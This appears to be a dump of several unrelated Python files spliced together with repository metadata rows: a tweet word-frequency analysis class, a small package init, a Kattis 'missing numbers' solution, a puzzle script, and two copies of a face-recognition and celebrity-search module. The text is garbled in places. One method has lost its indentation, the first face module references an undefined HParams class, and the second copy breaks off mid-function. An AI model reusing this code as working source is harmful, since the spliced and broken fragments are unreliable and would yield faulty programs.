            username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
            self.tweets_df.drop(username_index, inplace=True)
    # Reindex dataframe so row labels are again contiguous
    self.tweets_df.index = range(len(self.tweets_df))
def drop_by_term_in_tweet(self, terms):
    """ Drop tweets whose text contains any element of terms.

    terms may be a single string (treated as one term) or a list of strings
    (each treated as a separate drop case). Useful for removing repetitive
    or spammy tweets, and for dropping retweets via the string "rt @".

    terms (string or python list of strings): terms that appear in tweets
        we want to drop

    Raises:
        Exception: if terms is neither a string nor a list.
    """
    if type(terms) in (str, unicode):
        text_index = self.tweets_df[self.tweets_df.text.str.contains(terms) == True].index
        self.tweets_df.drop(text_index, inplace=True)
    elif type(terms) == list:
        for term in terms:
            assert type(term) in (str, unicode)
            assert len(term) > 0
            # Each term is dropped independently, re-querying the shrinking df
            text_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
            self.tweets_df.drop(text_index, inplace=True)
    else:
        raise Exception("Input must be string or list of string.")
    # Reindex dataframe so row labels are again contiguous
    self.tweets_df.index = range(len(self.tweets_df))
def drop_by_username_with_n_tweets(self, max_num_occurrences=1):
""" Drops all tweets by usernames that appear more than
max_num_occurrences times in tweets_df.
This function can be time consuming.
Dropping all users with more than 1 tweet should be a safe way to
filter out a lot of the spam.
"""
start_time = time.time()
print "Dropping tweets by repeated users..."
# get list of usernames that occur too much
repeat_user_counts = self.tweets_df["username"].value_counts()
for i in range(len(repeat_user_counts)):
if repeat_user_counts[i] <= max_num_occurrences:
break_index = i
break
repeated_usernames = list(repeat_user_counts[0:break_index].index)
print "Found", len(repeated_usernames), "users with more than", \
max_num_occurrences, "tweets in tweets_df"
# drop these usernames from tweets_df
percentile_num = len(repeated_usernames)//20
for i, twitter_username in enumerate(repeated_usernames):
if len(repeated_usernames) <= 100:
print "Dropping tweets from user", i
elif i%percentile_num == 0:
print "Finished", 5*i/percentile_num, "percent of user drops"
drop_index = self.tweets_df[self.tweets_df.username == twitter_username].index
self.tweets_df.drop(drop_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
print "Took", round((time.time() - start_time)/60.,3), \
"minutes to complete"
def add_stop_words(self, stopwords_item):
    """ Append a word or list of words to the stop words used by
    create_word_bag.

    The word might be a url fragment or spam tag that keeps showing up in
    the corpus. New stopwords are appended at the end of self.stop_words so
    recently added ones are easy to find. All entries are normalized to
    unicode before being stored.

    stopwords_item (string or list of strings): stopword(s) to add

    Raises:
        Exception: if stopwords_item is neither a string nor a list.
    """
    if type(stopwords_item) in (str, unicode):
        if type(stopwords_item) == str:
            # convert string to unicode if not unicode already
            stopwords_item = stopwords_item.decode('utf-8')
        self.stop_words = self.stop_words + [stopwords_item]
    elif type(stopwords_item) == list:
        # Validate every entry before converting any of them
        for term in stopwords_item:
            assert type(term) in (str, unicode)
            assert len(term) > 0
        unicode_terms_list = [term if type(term) == unicode
                              else term.decode('utf-8')
                              for term in stopwords_item]
        self.stop_words = self.stop_words + unicode_terms_list
    else:
        raise Exception("Input must be string or list of strings.")
#############################################################
# Methods for investigating word frequencies
#############################################################
""" The create_word_freq_df method is used to create a dataframe
that gives the word occurrences and word frequencies of the top n words in
the corpus. This is created using the existing nltk object, and it is
changed depending on how many words we wish to inspect graphically.
This word frequency dataframe is fundamental object of interest, and is
stored in the word_freq_df attribute, which is a pandas dataframe.
For now the background corpus is derived from ~2.6 GB of twitter data,
composing about 72 million words. The word frequency rates from this
sample are stored in a frequency sample file that is then converted into
a python dictionary for fast lookup.
"""
def create_word_bag(self):
    """ Build self.word_bag: a flat list of every word in every tweet, with
    stop words removed.

    Called repeatedly during data inspection, since the bag must be rebuilt
    whenever tweets are dropped from tweets_df. Prints timing for each of
    the three stages since they can each take minutes on large corpora.
    """
    start_time = time.time()
    # Convert dataframe tweets column to python list of tweets, then join
    # this list together into one long string of all tweet text
    tweets_list = self.tweets_df["text"].tolist()
    words_string = " ".join(tweets_list)
    print "Time to make words_string: ", round((time.time() - start_time)/60., 3), "minutes"
    start_time = time.time()
    # Use nltk word tokenization to break the string into words, then
    # filter out the stop words
    tokens = nltk.word_tokenize(words_string)
    print "Time to tokenize: ", round((time.time() - start_time)/60., 3), "minutes"
    start_time = time.time()
    self.word_bag = [word for word in tokens if word not in self.stop_words]
    print "Time to compute word bag: ", round((time.time() - start_time)/60., 3), "minutes"
def make_nltk_object_from_word_bag(self, word_bag=None):
    """ Create an nltk frequency-distribution object (self.freq_dist) from
    a word bag.

    By default the current self.word_bag attribute is used; pass word_bag
    explicitly to build the distribution from an external bag instead.

    Useful methods on the resulting object:
      - freq_dist.freq(term): relative frequency of term in the corpus
      - print(freq_dist): number of unique words / total words
      - freq_dist.most_common(50): 50 most common words with their counts

    word_bag (list of strings or None): words to analyze; defaults to
        self.word_bag.
    """
    if word_bag is None:
        word_bag = self.word_bag
    # Bug fix: this previously called nltk.FreqDist(self.word_bag), which
    # silently ignored an externally supplied word_bag argument.
    self.freq_dist = nltk.FreqDist(word_bag)
def create_word_freq_df(self, top_n_words):
    """ Build self.word_freq_df: a dataframe of the top_n_words most common
    corpus words, with columns:

    occurrences: how often each word occurred in the corpus
    frequency: word frequency in the corpus
    relative frequency: ratio of corpus frequency to background frequency
    log relative frequency: log of that ratio (symmetric: 2x above and 2x
        below background give +x and -x respectively)
    background occurrences: count of the word in the background corpus

    Words are taken in corpus-frequency order, so choose a large
    top_n_words to be sure the interesting over-represented words are
    included. The search terms themselves are skipped (as long as
    self.search_terms is set). Words absent from the background dictionary
    get zeros for the ratio columns.

    top_n_words (int): number of most frequent words to include
    """
    print "Creating word_freq_df..."
    print "Takes about 1 minute per 1000 words"
    start_time = time.time()
    # make dataframe we'll use in plotting
    num_words = top_n_words
    word_frequencies_list = []
    for word, occurrences in self.freq_dist.most_common(num_words):
        # determine whether word appears in background dict; if it does
        # not, the frequency ratio is set to zero
        if word in self.search_terms:
            continue
        if word in self.background_dict.keys():
            # background_dict maps word -> (frequency, occurrence count)
            freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
            # NOTE(review): background_freq is assigned but never used in
            # either branch -- candidate for removal.
            background_freq = self.background_dict[word][0]
            log_freq_ratio = log(freq_ratio)
            background_occur = self.background_dict[word][1]
        else:
            freq_ratio = 0
            background_freq = 0
            log_freq_ratio = 0
            background_occur = 0
        # faster to make list and then make dataframe in one line
        # than to repeatedly append to an existing dataframe
        word_frequencies_list.append((word, occurrences,
                                      self.freq_dist.freq(word),
                                      freq_ratio, log_freq_ratio,
                                      background_occur))
    word_freq_df = pd.DataFrame(word_frequencies_list,
                                columns=['word', 'occurrences', 'frequency',
                                         'relative frequency', 'log relative frequency',
                                         'background occurrences'])
    print "Time to create word_freq_df: ", \
          round((time.time() - start_time)/60., 4), "minutes"
    self.word_freq_df = word_freq_df
def custom_word_frequency_dataframe(self, words):
    """ Same as create_word_freq_df except a caller-supplied word list is
    used instead of the top n corpus words, and the resulting dataframe is
    *returned* rather than stored on self.

    Example use: build a "word vector" of known words of interest (e.g.
    "conservative", "liberal", "regulation") for a searched term.

    words (list of strings): words to put in dataframe

    Returns:
        pandas dataframe with the same row schema as word_freq_df.
        NOTE(review): the last column here is named 'background_occur'
        while create_word_freq_df names it 'background occurrences' -- this
        mismatch will misalign the advertised pd.concat with word_freq_df.
    """
    word_frequencies_list = []
    # Normalize all inputs to unicode so dict/corpus lookups are consistent
    words = [x.decode("utf-8") if type(x) == str else x for x in words]
    for word in words:
        # determine whether word appears in both background dict and corpus
        # if it does not, the frequency ratio is set to zero
        if word in self.search_terms:
            continue
        occurrences = self.freq_dist[word]
        if word in self.background_dict.keys() and occurrences != 0:
            freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
            # NOTE(review): background_freq is assigned but never used.
            background_freq = self.background_dict[word][0]
            log_freq_ratio = log(freq_ratio)
            background_occur = self.background_dict[word][1]
        else:
            freq_ratio = 0
            background_freq = 0
            log_freq_ratio = 0
            background_occur = 0
        # faster to make list and then make dataframe in one line
        # than to repeatedly append to an existing dataframe
        word_frequencies_list.append((word, occurrences,
                                      self.freq_dist.freq(word),
                                      freq_ratio, log_freq_ratio,
                                      background_occur))
    word_freq_df = pd.DataFrame(word_frequencies_list,
                                columns=['word', 'occurrences', 'frequency',
                                         'relative frequency', 'log relative frequency',
                                         'background_occur'])
    return word_freq_df
def plot_word_frequencies(self, plot_string, dataframe=None):
    """ Horizontal bar plot of one word_freq_df column, one bar per word.

    This is a convenience wrapper; for detailed plots use word_freq_df and
    matplotlib directly. Note the plot can't display unicode characters
    correctly, so a word rendered as a little box must be looked up in
    word_freq_df to see the actual character.

    plot_string (string): column of word_freq_df to plot, e.g.
        "occurrences", "frequency", "relative frequency",
        "log relative frequency", etc.
    dataframe (pandas dataframe): dataframe of the same form as
        word_freq_df; defaults to self.word_freq_df

    Raises:
        Exception: if plot_string is not a plottable column.
        NOTE(review): the bare except also swallows unrelated matplotlib
        errors and re-raises them under this misleading message.
    """
    if dataframe is None:
        dataframe = self.word_freq_df
    num_words = len(dataframe)
    try:
        # Figure height scales with the word count so labels stay readable
        dataframe.set_index("word")[plot_string].plot.barh(figsize=(20,
            num_words/2.), fontsize=30, color="c");
        plt.title(plot_string, fontsize=30);
        ax = plt.axes();
        ax.xaxis.grid(linewidth=4);
    except:
        raise Exception("Input string must be column name of word_freq_df")
""" This was more customized code that can be used later if needed - for
now the pandas default plotting code is good enough for most purposes
sns.set(style="darkgrid")
num_words = len(self.word_freq_df)
# Initialize the matplotlib figure - the second number in figure gives
# height, this will need to depend on how many words are included in
# figure
f, ax = plt.subplots(figsize=(16, num_words/2.))
plt.yticks(fontsize=20)
plt.xticks(fontsize=20)
# Plot the frequencies
sns.set_color_codes("pastel")
sns.barplot(x=plot_string, y="word", data=self.word_freq_df,
label="frequency", color="b")
# Add informative axis label
max_value = self.word_freq_df.iloc[0].frequency # find maximum frequency
# adjust axis to be slightly larger than this max frequency
ax.set(xlim=(0, max_value*1.1), ylabel="", xlabel="Word frequency")
ax.set_xlabel(plot_string, fontsize=30)
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
ax.tick_params(axis='x', labelsize=20) # size of numerical labels
"""
#############################################################
# Methods to inspect tweets in tweets_df dataframe
#############################################################
""" These methods are used to inspect tweets of interest in the main
dataframe tweets_df. A typical workflow is to visualize tweet word
frequencies using visualization functions, then inspect a sample of tweets
that contain a word of interest. If these tweets appear to be unwanted they
can then be dropped using the dropping functions above.
Note about displaying tweets in pandas in readable form: need to set
pd.set_option('display.max_colwidth', -1) and/or
pd.set_option('display.width',800)
This makes it so entire tweet is displayed without cutoff when only tweets
are presented in dataframe.
Can enter pd.describe_option('display') to get comprehensive list of
settings for ipython displays.
"""
def tweets_containing(self, term):
    """ Return the username/text columns of all tweets whose text contains
    term, and print how many matched.

    term (string): term of interest; must be a non-empty str or unicode

    Returns:
        pandas dataframe: the matching rows of tweets_df, restricted to
        the "username" and "text" columns.
    """
    assert type(term) in (str, unicode)
    assert term
    tweets_containing = self.tweets_df[self.tweets_df.text.str.contains(term) == True]
    print len(tweets_containing), "tweets contain this term"
    return tweets_containing[["username", "text"]]
def tweets_by(self, username):
    """ Return the username/text columns of all tweets posted by username.

    Companion to tweets_containing, but filters on exact username equality
    rather than tweet text.

    username (string): username of interest; must be non-empty

    Returns:
        pandas dataframe: the matching rows of tweets_df, restricted to
        the "username" and "text" columns.
    """
    assert type(username) in (str, unicode)
    assert username
    tweets_by = self.tweets_df[self.tweets_df.username == username]
    return tweets_by[["username", "text"]]
| 396 | 0 | 54 |
35399c5f7200466f779bc16de6978d488fb725b7 | 399 | py | Python | parameter/__init__.py | coldnight/parameter | 70a9f5e21ebb78d526d074eea64a16242b129848 | [
"Apache-2.0"
] | 2 | 2017-08-08T03:30:25.000Z | 2017-12-02T19:10:38.000Z | parameter/__init__.py | coldnight/parameter | 70a9f5e21ebb78d526d074eea64a16242b129848 | [
"Apache-2.0"
] | null | null | null | parameter/__init__.py | coldnight/parameter | 70a9f5e21ebb78d526d074eea64a16242b129848 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Reexport"""
from __future__ import print_function, division, unicode_literals
from .model import Model, Argument, BaseAdapter
from .exception import ArgumentError, ArgumentMissError, ArgumentInvalidError
__version__ = "0.0.2"
__all__ = ["ArgumentError", "ArgumentMissError", "ArgumentInvalidError",
"Model", "Argument", "BaseAdapter"]
| 26.6 | 77 | 0.736842 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Reexport"""
from __future__ import print_function, division, unicode_literals
from .model import Model, Argument, BaseAdapter
from .exception import ArgumentError, ArgumentMissError, ArgumentInvalidError
__version__ = "0.0.2"
__all__ = ["ArgumentError", "ArgumentMissError", "ArgumentInvalidError",
"Model", "Argument", "BaseAdapter"]
| 0 | 0 | 0 |
eea6820d66c1cc7a727aa191616c827de43dab06 | 433 | py | Python | kattis/missingnumbers.py | btjanaka/competitive-programming-solutions | e3df47c18451802b8521ebe61ca71ee348e5ced7 | [
"MIT"
] | 3 | 2020-06-25T21:04:02.000Z | 2021-05-12T03:33:19.000Z | kattis/missingnumbers.py | btjanaka/competitive-programming-solutions | e3df47c18451802b8521ebe61ca71ee348e5ced7 | [
"MIT"
] | null | null | null | kattis/missingnumbers.py | btjanaka/competitive-programming-solutions | e3df47c18451802b8521ebe61ca71ee348e5ced7 | [
"MIT"
] | 1 | 2020-06-25T21:04:06.000Z | 2020-06-25T21:04:06.000Z | # Author: btjanaka (Bryon Tjanaka)
# Problem: (Kattis) missingnumbers
# Title: Missing Numbers
# Link: https://open.kattis.com/problems/missingnumbers
# Idea: Keep counting.
# Difficulty: easy
# Tags: implementation
# Read n values from stdin and print every integer skipped between them
# (the inputs arrive in increasing order per the problem statement).
n = int(input())
cur = 1  # next value we expect to see
num_printed = 0  # count of missing numbers reported so far
for _ in range(n):
    k = int(input())
    # Everything from cur up to (but excluding) k was skipped
    while cur < k:
        num_printed += 1
        print(cur)
        cur += 1
    cur = k + 1
# Nothing was missing: praise the input instead
if num_printed == 0: print("good job")
| 21.65 | 55 | 0.632794 | # Author: btjanaka (Bryon Tjanaka)
# Problem: (Kattis) missingnumbers
# Title: Missing Numbers
# Link: https://open.kattis.com/problems/missingnumbers
# Idea: Keep counting.
# Difficulty: easy
# Tags: implementation
# Kattis "missingnumbers": read n increasing integers from stdin and echo
# every integer that was skipped between consecutive inputs.
n = int(input())
cur = 1  # next expected value
num_printed = 0  # how many gaps were reported
for _ in range(n):
    k = int(input())
    # Report the gap between the previous input and this one
    while cur < k:
        num_printed += 1
        print(cur)
        cur += 1
    cur = k + 1
# No gaps at all: the required output is the literal "good job"
if num_printed == 0: print("good job")
| 0 | 0 | 0 |
f490e6a25b99549407a4432f866c4c80cbdaff53 | 339 | py | Python | dag_03.py | harkabeeparolus/kodkalender-2020 | ad6ca9c6e067ad206c54854771c8c6bb1bf27cfa | [
"MIT"
] | null | null | null | dag_03.py | harkabeeparolus/kodkalender-2020 | ad6ca9c6e067ad206c54854771c8c6bb1bf27cfa | [
"MIT"
] | null | null | null | dag_03.py | harkabeeparolus/kodkalender-2020 | ad6ca9c6e067ad206c54854771c8c6bb1bf27cfa | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
"""Unga programmerare kodkalender 2020, lucka 3."""
# https://ungaprogrammerare.se/kodkalender/lucka-3/
import functools
import math
import operator
# Lucka 3: split 100! by the product of every even number from 2 to 164
# (range's upper bound 165 is exclusive, so the last factor is 164).
total_count = math.factorial(100)
even_product = functools.reduce(operator.mul, range(2, 165, 2))
# The quotient is ~4.06e10; round() turns the float division into the answer.
how_many = round(total_count / even_product)
print(f"Antal delar: {how_many}")
# Antal delar: 40599194442
| 21.1875 | 52 | 0.731563 | #! /usr/bin/env python3
"""Unga programmerare kodkalender 2020, lucka 3."""
# https://ungaprogrammerare.se/kodkalender/lucka-3/
import functools
import math
import operator
# a = 100!, b = product of all even numbers 2*4*...*164
# (range stops at 164 since the bound 165 is exclusive)
a = math.factorial(100)
b = functools.reduce(operator.mul, range(2, 165, 2))
# Integer true-division yields a float (~4.06e10); round gives the answer
how_many = round(a / b)
print(f"Antal delar: {how_many}")
# Antal delar: 40599194442
| 0 | 0 | 0 |
d25e0e3402b84408e43fdbf5a922a14a3ddebf16 | 13,327 | py | Python | utils/face.py | foamliu/i-Cloud | c5eb0a22c1c0c78d5195d4f62237fd6c2b5e6a32 | [
"MIT"
] | 1 | 2020-02-27T07:46:24.000Z | 2020-02-27T07:46:24.000Z | utils/face.py | foamliu/i-Cloud | c5eb0a22c1c0c78d5195d4f62237fd6c2b5e6a32 | [
"MIT"
] | null | null | null | utils/face.py | foamliu/i-Cloud | c5eb0a22c1c0c78d5195d4f62237fd6c2b5e6a32 | [
"MIT"
] | 2 | 2019-04-25T22:56:41.000Z | 2019-07-01T21:12:21.000Z | import datetime
import math
import os
import pickle
import random
import shutil
import time
import zipfile
import cv2 as cv
import numpy as np
import torch
from PIL import Image
from flask import request
from scipy.stats import norm
from torch import nn
from torch.utils.data import Dataset
from torchvision import transforms
from tqdm import tqdm
from werkzeug.utils import secure_filename
from align_faces import get_reference_facial_points, warp_and_crop_face
from config import STATIC_DIR, UPLOAD_DIR
from config import image_h, image_w, device, logger
from models import resnet101
from mtcnn.detector import detect_faces
from utils.common import ensure_folder, resize, AverageMeter
# Torchvision preprocessing pipelines; 'train' adds a random horizontal
# flip, 'val' only converts to tensor and normalizes with ImageNet stats.
data_transforms = {
    'train': transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ]),
    'val': transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ]),
}
# All inference below uses the validation transform
transformer = data_transforms['val']
# Running average of per-image processing time (see face_feature_batch)
times = AverageMeter()
# NOTE(review): HParams is not defined above this point in this copy of
# the file -- importing it would raise NameError; confirm the class
# definition was not accidentally removed.
config = HParams()
checkpoint = 'repo/face/insight-face-v3.pt'
logger.info('loading model: {}...'.format(checkpoint))
# Load the face-embedding backbone once at import time and keep it in
# eval mode for inference.
model = resnet101(config)
model.load_state_dict(torch.load(checkpoint))
model = nn.DataParallel(model)
model = model.to(device)
model.eval()
# model params: decision threshold (degrees) and the parameters of two
# fitted normal distributions over angular distance -- presumably
# (mu_0, sigma_0) for different-person pairs and (mu_1, sigma_1) for
# same-person pairs; used by get_prob elsewhere. TODO confirm.
threshold = 76.75066649278368
mu_0 = 89.76046947988898
sigma_0 = 4.498024182861556
mu_1 = 42.66766813673472
sigma_1 = 8.62761102672923
class FaceNotFoundError(Exception):
    """Raised when no face can be detected in a supplied image."""
    pass
if __name__ == "__main__":
    # Manual smoke test: compare an ID-card photo against four live photos
    # (results are only logged, not asserted).
    compare('id_card.jpg', 'photo_1.jpg')
    compare('id_card.jpg', 'photo_2.jpg')
    compare('id_card.jpg', 'photo_3.jpg')
    compare('id_card.jpg', 'photo_4.jpg')
| 29.161926 | 109 | 0.648758 | import datetime
import math
import os
import pickle
import random
import shutil
import time
import zipfile
import cv2 as cv
import numpy as np
import torch
from PIL import Image
from flask import request
from scipy.stats import norm
from torch import nn
from torch.utils.data import Dataset
from torchvision import transforms
from tqdm import tqdm
from werkzeug.utils import secure_filename
from align_faces import get_reference_facial_points, warp_and_crop_face
from config import STATIC_DIR, UPLOAD_DIR
from config import image_h, image_w, device, logger
from models import resnet101
from mtcnn.detector import detect_faces
from utils.common import ensure_folder, resize, AverageMeter
# Torchvision preprocessing: 'train' adds random horizontal flip, 'val'
# only tensor-converts and normalizes with ImageNet mean/std.
data_transforms = {
    'train': transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ]),
    'val': transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
    ]),
}
# Inference always uses the validation transform
transformer = data_transforms['val']
# Running average of per-image latency, updated by face_feature_batch
times = AverageMeter()
class HParams:
    """Hyper-parameter container passed to the resnet101 backbone."""

    def __init__(self):
        # Do not load pretrained weights; the checkpoint below supplies them
        self.pretrained = False
        # use_se: presumably enables squeeze-and-excitation blocks in the
        # backbone -- confirm against models.resnet101
        self.use_se = True
config = HParams()
checkpoint = 'repo/face/insight-face-v3.pt'
logger.info('loading model: {}...'.format(checkpoint))
# Load the embedding model once at import time; kept in eval mode since
# this module only performs inference.
model = resnet101(config)
model.load_state_dict(torch.load(checkpoint))
model = nn.DataParallel(model)
model = model.to(device)
model.eval()
# model params: angular decision threshold (degrees) plus the parameters
# of two fitted normals over angular distance -- presumably mu_0/sigma_0
# for different-person pairs and mu_1/sigma_1 for same-person pairs, as
# consumed by get_prob and compare. TODO confirm fitting source.
threshold = 76.75066649278368
mu_0 = 89.76046947988898
sigma_0 = 4.498024182861556
mu_1 = 42.66766813673472
sigma_1 = 8.62761102672923
class FaceNotFoundError(Exception):
    """Raised when no face can be detected in a supplied image."""
    pass
def align_face(img_fn, facial5points):
    """Warp-and-crop the face in image file img_fn to a canonical
    (image_h, image_w) crop using its 5 facial landmarks.

    img_fn: path to the image on disk.
    facial5points: 10 landmark values, reshaped below to (2, 5).
    Returns the aligned face crop as an OpenCV (BGR) image array.
    """
    # Second imread arg True coerces to 1 (= color read flag)
    raw = cv.imread(img_fn, True)
    facial5points = np.reshape(facial5points, (2, 5))
    crop_size = (image_h, image_w)
    default_square = True
    inner_padding_factor = 0.25
    outer_padding = (0, 0)
    output_size = (image_h, image_w)
    # get the reference 5 landmarks position in the crop settings
    reference_5pts = get_reference_facial_points(
        output_size, inner_padding_factor, outer_padding, default_square)
    # dst_img = warp_and_crop_face(raw, facial5points)
    dst_img = warp_and_crop_face(raw, facial5points, reference_pts=reference_5pts, crop_size=crop_size)
    return dst_img
def get_central_face_attributes(full_path):
    """Detect faces in the image at full_path and return the one closest
    to the image center.

    Returns (True, [bbox], [landmarks]) on success, or (False, None, None)
    when no face is found or MTCNN raises ValueError.
    """
    try:
        img = Image.open(full_path).convert('RGB')
        bounding_boxes, landmarks = detect_faces(img)
        if len(landmarks) > 0:
            i = select_central_face(img.size, bounding_boxes)
            # Wrap in single-element lists to match the detector's shape
            return True, [bounding_boxes[i]], [landmarks[i]]
    except KeyboardInterrupt:
        raise
    except ValueError:
        # Treat detector failures on malformed images as "no face"
        pass
    return False, None, None
def get_all_face_attributes(full_path):
    """Run MTCNN on the image at full_path and return all detected
    (bounding_boxes, landmarks), with no error handling or filtering."""
    img = Image.open(full_path).convert('RGB')
    bounding_boxes, landmarks = detect_faces(img)
    return bounding_boxes, landmarks
def select_central_face(im_size, bounding_boxes):
    """Pick the detected face whose box center is closest to the image center.

    im_size: (width, height) pair, e.g. PIL's Image.size.
    bounding_boxes: sequence of boxes, each starting with [x1, y1, x2, y2].

    Returns the index of the closest box; -1 when the sequence is empty
    (or, preserving the original guard, when every center is at least
    100000 pixels away).
    """
    width, height = im_size
    image_cx = width / 2
    image_cy = height / 2
    chosen_index = -1
    smallest_gap = 100000
    for index, box in enumerate(bounding_boxes):
        box_cx = (box[0] + box[2]) / 2
        box_cy = (box[1] + box[3]) / 2
        gap = math.sqrt((box_cx - image_cx) ** 2 + (box_cy - image_cy) ** 2)
        # Strict comparison: ties keep the earlier detection
        if gap < smallest_gap:
            smallest_gap = gap
            chosen_index = index
    return chosen_index
def draw_bboxes(img, bounding_boxes, facial_landmarks=[]):
    """Draw every bounding box on img (in place), plus the 5 landmark dots
    for the FIRST landmark set only, and return img.

    NOTE(review): the mutable default [] for facial_landmarks is never
    mutated here, so it is harmless, but a None default would be safer.
    """
    for b in bounding_boxes:
        cv.rectangle(img, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 255, 255), 1)
    # Landmarks are stored as [x0..x4, y0..y4] per face
    for p in facial_landmarks:
        for i in range(5):
            cv.circle(img, (int(p[i]), int(p[i + 5])), 1, (0, 255, 0), -1)
        break  # only first
    return img
def get_image(filename, flip=False, draw=True):
    """Load, align, and preprocess the central face of an image file into
    a normalized tensor on `device`.

    filename: path to the image; when draw=True the file is OVERWRITTEN
        in place with bounding boxes / landmarks drawn on it.
    flip: horizontally mirror the aligned crop before preprocessing.

    Raises FaceNotFoundError when no face is detected.
    """
    has_face, bboxes, landmarks = get_central_face_attributes(filename)
    if not has_face:
        raise FaceNotFoundError(filename)
    img = align_face(filename, landmarks)
    if flip:
        img = np.flip(img, 1)
    # numpy crop -> PIL -> normalized tensor (the 'val' transform)
    img = transforms.ToPILImage()(img)
    img = transformer(img)
    img = img.to(device)
    if draw:
        logger.info('drawing bboxes: {}'.format(filename))
        # Re-detect all faces just for visualization
        bboxes, landmarks = get_all_face_attributes(filename)
        pic = cv.imread(filename)
        pic = draw_bboxes(pic, bboxes, landmarks)
        cv.imwrite(filename, pic)
    return img
def get_image_batch(filename, draw=True):
    """Like get_image, but returns BOTH the aligned crop and its horizontal
    mirror as preprocessed tensors (img_0, img_1) -- the two are averaged
    downstream for a flip-augmented embedding.

    When draw=True the input file is overwritten with drawn boxes.
    Raises FaceNotFoundError when no face is detected.
    """
    has_face, bboxes, landmarks = get_central_face_attributes(filename)
    if not has_face:
        raise FaceNotFoundError(filename)
    img = align_face(filename, landmarks)
    img_0 = img
    # copy() avoids the negative-stride view np.flip would otherwise share
    img_1 = np.flip(img.copy(), 1)
    img_0 = transforms.ToPILImage()(img_0)
    img_0 = transformer(img_0)
    img_0 = img_0.to(device)
    img_1 = transforms.ToPILImage()(img_1)
    img_1 = transformer(img_1)
    img_1 = img_1.to(device)
    if draw:
        logger.info('drawing bboxes: {}'.format(filename))
        bboxes, landmarks = get_all_face_attributes(filename)
        pic = cv.imread(filename)
        pic = draw_bboxes(pic, bboxes, landmarks)
        cv.imwrite(filename, pic)
    return img_0, img_1
def compare(fn_0, fn_1):
    """Compare the faces in two image files.

    Embeds both faces in one forward pass, converts the cosine similarity
    of the L2-normalized embeddings into an angle (degrees), and returns
    (prob, is_same) where prob comes from get_prob and is_same is the
    hard decision theta < threshold.

    NOTE(review): unlike search(), the cosine is not clipped to [-1, 1]
    here, so math.acos could raise on a value epsilon above 1 -- confirm.
    """
    logger.info('fn_0: ' + fn_0)
    logger.info('fn_1: ' + fn_1)
    img0 = get_image(fn_0)
    img1 = get_image(fn_1)
    imgs = torch.zeros([2, 3, 112, 112], dtype=torch.float)
    imgs[0] = img0
    imgs[1] = img1
    imgs = imgs.to(device)
    with torch.no_grad():
        output = model(imgs)
        feature0 = output[0].cpu().numpy()
        feature1 = output[1].cpu().numpy()
    # Cosine similarity of unit vectors, then convert to degrees
    x0 = feature0 / np.linalg.norm(feature0)
    x1 = feature1 / np.linalg.norm(feature1)
    cosine = np.dot(x0, x1)
    theta = math.acos(cosine)
    theta = theta * 180 / math.pi
    logger.info('theta: ' + str(theta))
    prob = get_prob(theta)
    logger.info('prob: ' + str(prob))
    return prob, theta < threshold
def get_prob(theta):
    """Turn an angular distance theta (degrees) into a match probability.

    Likelihoods come from two fitted normals over theta: (mu_1, sigma_1)
    is the lower-angle mode (matching pairs) and (mu_0, sigma_0) the
    higher-angle mode; equal priors are assumed.
    """
    match_density = norm.pdf(theta, mu_1, sigma_1)
    nonmatch_density = norm.pdf(theta, mu_0, sigma_0)
    return match_density / (match_density + nonmatch_density)
def search(full_path):
    """Find the celebrity most similar to the face in full_path.

    Embeds the query face, loads the precomputed gallery from
    static/stars.pkl (a dict with 'names', 'files', and L2-normalized
    'features'), takes the argmax cosine similarity, and converts it to
    an angle/probability.

    Returns (name, prob, gallery_file) of the best match.
    Raises FaceNotFoundError (via get_image) when no face is detected.
    """
    img = get_image(full_path)
    imgs = torch.zeros([1, 3, 112, 112], dtype=torch.float)
    imgs[0] = img
    imgs = imgs.to(device)
    with torch.no_grad():
        output = model(imgs)
        feature = output[0].cpu().numpy()
    x = feature / np.linalg.norm(feature)
    # Gallery is reloaded on every call -- candidate for module-level cache
    with open('static/stars.pkl', 'rb') as file:
        data = pickle.load(file)
    names = data['names']
    files = data['files']
    features = data['features']
    # One matrix-vector product scores the whole gallery at once
    cosine = np.dot(features, x)
    # Clip so acos below cannot receive a value just outside [-1, 1]
    cosine = np.clip(cosine, -1, 1)
    logger.info('cosine.shape: ' + str(cosine.shape))
    max_index = int(np.argmax(cosine))
    max_value = cosine[max_index]
    logger.info('max_index: ' + str(max_index))
    logger.info('max_value: ' + str(max_value))
    logger.info('name: ' + names[max_index])
    logger.info('file: ' + files[max_index])
    theta = math.acos(max_value)
    theta = theta * 180 / math.pi
    logger.info('theta: ' + str(theta))
    prob = get_prob(theta)
    logger.info('prob: ' + str(prob))
    return names[max_index], prob, files[max_index]
def get_feature(full_path):
    """Compute a flip-augmented, L2-normalized face embedding for the
    image at full_path.

    The original and mirrored crops are embedded in one batch; their
    feature sum is normalized to a unit vector before returning.
    Raises FaceNotFoundError (via get_image) when no face is detected.
    """
    imgs = torch.zeros([2, 3, 112, 112], dtype=torch.float)
    imgs[0] = get_image(full_path, draw=False)
    imgs[1] = get_image(full_path, flip=True, draw=False)
    imgs = imgs.to(device)
    with torch.no_grad():
        output = model(imgs)
    feature = output[0].cpu().numpy() + output[1].cpu().numpy()
    x = feature / np.linalg.norm(feature)
    return x
def face_verify():
    """Flask handler body: save the two uploaded images ('file1', 'file2')
    to UPLOAD_DIR, resize them, and run compare().

    Returns (is_same, prob, elapsed_seconds, saved_name_1, saved_name_2).
    Must be called inside a Flask request context (reads `request`).
    """
    start = time.time()
